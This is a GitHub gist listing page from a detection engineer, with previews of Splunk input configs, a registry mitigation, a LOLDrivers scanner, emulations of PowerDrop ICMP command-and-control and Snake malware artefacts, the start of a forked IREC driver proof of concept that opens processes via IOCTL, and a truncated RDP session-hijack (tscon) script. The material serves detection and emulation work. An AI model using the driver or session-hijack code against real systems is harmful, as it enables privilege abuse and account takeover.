Skip to content

Instantly share code, notes, and snippets.

View MHaggis's full-sized avatar
:shipit:

Michael Haag MHaggis

:shipit:
469 followers · 92 following
View GitHub Profile
@MHaggis
MHaggis / LOLProtocolHandlers.md
Created August 31, 2023 20:30

Inventory Protocol Handlers

Splunk:

[powershell://LOLProtocolHandlers]
script = Get-Item Registry::HKEY_CLASSES_ROOT\*| Select-Object "Property", "PSChildName"  | ForEach-Object { $_ | ConvertTo-Json; Write-Host "" }
#schedule = 0 0 * * *
schedule = */1 * * * *
sourcetype = PwSh:LOLProtocolHandlers
index=win
@MHaggis
MHaggis / Source.cpp
Created August 20, 2023 13:18 — forked from dru1d-foofus/README.md
IREC-PoC
#include <windows.h>
#include <iostream>
#include <dbghelp.h>
#include <TlHelp32.h>
#define IOCTL_BASE 0x80012008
constexpr DWORD IREC_IOCTL(DWORD x) { return IOCTL_BASE + x; }
#define IOTCL_IREC_OPEN_PROCESS IREC_IOCTL( 0x20 )
static const char* DeviceName = R"(\\.\IREC)";
@MHaggis
MHaggis / FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION.md
Last active July 21, 2023 12:04

Organizations who cannot take advantage of these protections can set the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key to avoid exploitation. Please note that while these registry settings would mitigate exploitation of this issue, it could affect regular functionality for certain use cases related to these applications.

MS Documentation for the referenced registry settings:

$registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION"
$applications = @("Excel.exe", "Graph.exe", "MSAccess.exe", "MSPub.exe", "PowerPnt.exe", "Visio.exe", "WinProj.exe", "WinWord.exe", "Wordpad.exe")
@MHaggis
MHaggis / powerdropping.md
Created June 9, 2023 20:49

PowerDropping

My script, PowerDropping, currently accomplishes the following parts of the PowerDrop behavior:

  • It sets a buffer size of 128 bytes, matching the chunk size PowerDrop uses when responses exceed this length.
  • It uses an ICMPClient, which aligns with PowerDrop's use of ICMP Echo Request messages.
  • It includes the use of a hard-coded IP address, similar to PowerDrop's hard-coded IP address for command and control communication.
  • It includes data in the ICMP Echo Request message. While my script uses a test string, PowerDrop uses a UTF16-LE encoded string, often a simple string like "!".
  • It includes a response timeout of 60 seconds, which is the same as PowerDrop's dwell time after sending a beacon.
  • It uses "DRP" and "OCD" as markers, aligning with PowerDrop's use of these strings as prepending and postpending markers in responses.
@MHaggis
MHaggis / Splunk_MOVEit.md
Created June 5, 2023 15:42

Ref: https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/

Rapid7 incident response consultants have identified a method to determine what was exfiltrated from compromised MOVEit customer environments. MOVEit writes its own Windows EVTX file, which is located at C:\Windows\System32\winevt\Logs\MOVEit.evtx. The MOVEit event logs contain a single event ID (Event ID 0) that provides a plethora of information, including the following:

  • File name
  • File path
  • File size
  • IP address
  • Username that performed download
@MHaggis
MHaggis / Scan-LOLDrivers.ps1
Created May 19, 2023 16:29
it works - but use with caution :) it's a bit noisy and I think it's broken
function Scan-LOLDrivers {
param(
[Parameter(Mandatory=$true)]
[string]$path
)
Add-Type -TypeDefinition @"
using System;
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;
@MHaggis
MHaggis / snake_queuefile.ps1
Created May 10, 2023 16:42
# Define the typical path of the Snake Queue File
$filePath = "$env:windir\registration\"
# Create the folder if it doesn't exist
$null = New-Item -Path $filePath -ItemType Directory -Force
# Generate a random GUID
$guid = [guid]::NewGuid().ToString()
# Define the file name using the generated GUID and the regex pattern
@MHaggis
MHaggis / Windows-TerminalServices-RemoteConnectionManager.md
Created April 17, 2023 20:58

To collect Windows-TerminalServices-RemoteConnectionManager/Operational, add the following to a inputs.conf

We've found that multiline data parses better natively without having to create a props/transforms.

[WinEventLog://Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational]
disabled = False
renderXml = False
index = win
@MHaggis
MHaggis / bootloader.md
Last active May 9, 2023 00:46 
# Modify for your environment. Make sure the sourcetype matches the analytic as needed.
[powershell://bootloader]
script = (bcdedit /enum /v) -split "-------------------" | % { if ($_ -match "path\s+(.+)") { Write-Output "Path: $($matches[1])" }; if ($_ -match "identifier\s+(.+)") { Write-Output "Identifier: $($matches[1])" }; if ($_ -match "description\s+(.+)") { Write-Output "Description: $($matches[1])" } }
schedule = 0 0 * * *
#schedule = */5 * * * *
sourcetype = PwSh:bootloader
index=win
@MHaggis
MHaggis / tscon
Created March 29, 2023 20:44
# Remote host
$remoteHost = "mswin-server.attackrange.local"
# Get query user output from remote host
$queryUserOutput = (quser /SERVER:$remoteHost)
# Parse disconnected sessions
$disconnectedSessionRegex = '^\s*(\S+)\s+(\d+)\s+.*\s+Disc\s+'
$disconnectedSessions = @($queryUserOutput | Where-Object { $_ -match $disconnectedSessionRegex } | ForEach-Object {
@{